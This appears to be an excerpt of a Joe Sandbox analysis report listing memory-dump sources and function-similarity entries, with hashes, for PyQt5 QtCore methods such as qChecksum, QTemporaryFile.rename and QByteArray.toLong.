                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Checksum@@FromLongLong_Unsigned$ChecksumQt@@@Type@
                                                                                                                                                                                                                • String ID: qChecksum$qChecksum(s: Optional[PyQt5.sip.array[bytes]]) -> intqChecksum(s: Optional[PyQt5.sip.array[bytes]], standard: Qt.ChecksumType) -> int
                                                                                                                                                                                                                • API String ID: 4073781253-2719622831
                                                                                                                                                                                                                • Opcode ID: d603ddb4b35efac91ae368aa3730149813ffa715516bcd4431e1fe70f2879c67
                                                                                                                                                                                                                • Instruction ID: a8f4fa9dd418ad85c244b969483cc1ddf3846f483f51cad35c4741312d582d29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d603ddb4b35efac91ae368aa3730149813ffa715516bcd4431e1fe70f2879c67
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F221FFB6A19A46C2EA408B25E4446AA73B0FB85B85F584132DA8D57738DF3CD195CB04
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?rename@Bool_File@@FromLongString@@@Temporary
                                                                                                                                                                                                                • String ID: BJ1$QTemporaryFile$rename$rename(self, newName: Optional[str]) -> bool
                                                                                                                                                                                                                • API String ID: 3156139533-3524770948
                                                                                                                                                                                                                • Opcode ID: c8b9ab9097497bf3d5b6b1980de738aa8ded10636ed7b4d3bed059750c387a60
                                                                                                                                                                                                                • Instruction ID: 1ca169968851902b68abe55b05f2274742dc7b09f521527258d7ae25120deda8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8b9ab9097497bf3d5b6b1980de738aa8ded10636ed7b4d3bed059750c387a60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA2118B6B09B46C1DB509F25E888AAD33A8FB48B90F954136CA9D53720EF39D558C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?moveAbstractBool_Column@FromIndex@@ItemLongModelModel@@
                                                                                                                                                                                                                • String ID: BJ9iJ9i$QAbstractItemModel$moveColumn$moveColumn(self, sourceParent: QModelIndex, sourceColumn: int, destinationParent: QModelIndex, destinationChild: int) -> bool
                                                                                                                                                                                                                • API String ID: 2089089902-3489222823
                                                                                                                                                                                                                • Opcode ID: 02f24afe79c26232b318d9e03045a23f5e7f95180ef573c6ba0f33f7203bd53e
                                                                                                                                                                                                                • Instruction ID: 7c3e736fa23d81648728e1d2d391093d05db7efb4c957bc99ee1343d5f0e2306
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02f24afe79c26232b318d9e03045a23f5e7f95180ef573c6ba0f33f7203bd53e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E121E6B6A09B46C5DB50CF21E888BAD33A4FB48790F964136DAAC53720EF39D558C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@ByteInt@
                                                                                                                                                                                                                • String ID: (lb)$B|i$QByteArray$toLong$toLong(self, base: int = 10) -> (int, Optional[bool])
                                                                                                                                                                                                                • API String ID: 1228521118-366114552
                                                                                                                                                                                                                • Opcode ID: b852139927e1d4abce9033287fd3fa2290072671fec2315351d263acb351e057
                                                                                                                                                                                                                • Instruction ID: e654c332fad83ddf4dc55c62f0950501c3dfa4dc5fac4ce7a33fa824de555506
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b852139927e1d4abce9033287fd3fa2290072671fec2315351d263acb351e057
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32216A72B19F56C1DB40CF25E848AAC33A8FB48B40F964036CA5D43720EF79D548C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?pos@Exp@@FromLongLong_
                                                                                                                                                                                                                • String ID: B|i$QRegExp$pos$pos(self, nth: int = 0) -> int
                                                                                                                                                                                                                • API String ID: 3337080624-4241860341
                                                                                                                                                                                                                • Opcode ID: 8e75ee873f0ed7fe6cab6ca656ed7fbba9b78e72303f266d00077950aafbe64f
                                                                                                                                                                                                                • Instruction ID: 3bf35f68a9a6acd0b2b8f81add284d46c407dfec272b96e70ac131e9ed754de1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e75ee873f0ed7fe6cab6ca656ed7fbba9b78e72303f266d00077950aafbe64f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B1128B2B09B06C5EB10DF60E8889AD33A8FB48780F964136CA9D53720EF79D959C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?beginAbstractItemModel@Model@@ResetRestoreSave
                                                                                                                                                                                                                • String ID: QIdentityProxyModel$beginResetModel$beginResetModel(self)
                                                                                                                                                                                                                • API String ID: 4136900167-3623192810
                                                                                                                                                                                                                • Opcode ID: 3d30f51d5a9a07e06e24078aad97b2a94c02fca134d85675ebd2825fe419ab31
                                                                                                                                                                                                                • Instruction ID: 41130386e2ff28dec21fd9ece642aaba7881306a834bc3a77cbe2b6479dc3e0f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d30f51d5a9a07e06e24078aad97b2a94c02fca134d85675ebd2825fe419ab31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 621106B5A09B4681DB009F21E89CBA933A4FB48B80F994032CA4E23320EFBDD559C344
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?intersects@Bool_FromItemLongRange@@SelectionV1@@
                                                                                                                                                                                                                • String ID: BJ9$QItemSelectionRange$intersects$intersects(self, other: QItemSelectionRange) -> bool
                                                                                                                                                                                                                • API String ID: 1715980402-2608086306
                                                                                                                                                                                                                • Opcode ID: 64bf7df201ded820581b0f2c8d6c938b1eddc22a7b9f6795eb01b99eb9a8a0f1
                                                                                                                                                                                                                • Instruction ID: 4a3b82057a9c455ecf5619b8472036760a4f03135b80fc8c1f4e0096a41394ed
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64bf7df201ded820581b0f2c8d6c938b1eddc22a7b9f6795eb01b99eb9a8a0f1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD1157B2A19F46C1EB40DF25E88CAA933A4FB48B80FA60032CA5D53320DF3DD959C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?index@QTransposeProxyModel@@UEBA?AVQModelIndex@@HHAEBV2@@Z.QT5CORE ref: 00007FFB02F4C4D0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?index@Index@@ModelModel@@ProxyTransposeV2@@
                                                                                                                                                                                                                • String ID: Bii|J9$QTransposeProxyModel$index$index(self, row: int, column: int, parent: QModelIndex = QModelIndex()) -> QModelIndex
                                                                                                                                                                                                                • API String ID: 477616551-2770291875
                                                                                                                                                                                                                • Opcode ID: e0fe06adfbc14489311ab97334c27ec598f8cb98091d06eee56c4b613ba20fb6
                                                                                                                                                                                                                • Instruction ID: f196fbb157227942838c53748dbd1584ad32a765e7b23f6e477db96da4c55c55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0fe06adfbc14489311ab97334c27ec598f8cb98091d06eee56c4b613ba20fb6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2413D76B09B8589EB508F75E8446AD33B4FB88B98F445232DE4D23B64EF78D155C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearDeallocErr_RectSubtypeType_V0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 1917406712-2407233842
                                                                                                                                                                                                                • Opcode ID: 4b9f03a94d3a2c535d916d26c6848e1a16a1385f9280d0e6222fba1e549a65ae
                                                                                                                                                                                                                • Instruction ID: 3ef280b6da1f63bf22130ea2fa794ebe81f50702befe3b3a482ad27f41461093
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b9f03a94d3a2c535d916d26c6848e1a16a1385f9280d0e6222fba1e549a65ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A53110B6A09B4682EB409B26F4446A97761FB88FC4F494131DE8D23779DF7CE095C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?mapToSource@QIdentityProxyModel@@UEBA?AVQModelIndex@@AEBV2@@Z.QT5CORE ref: 00007FFB0300454A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
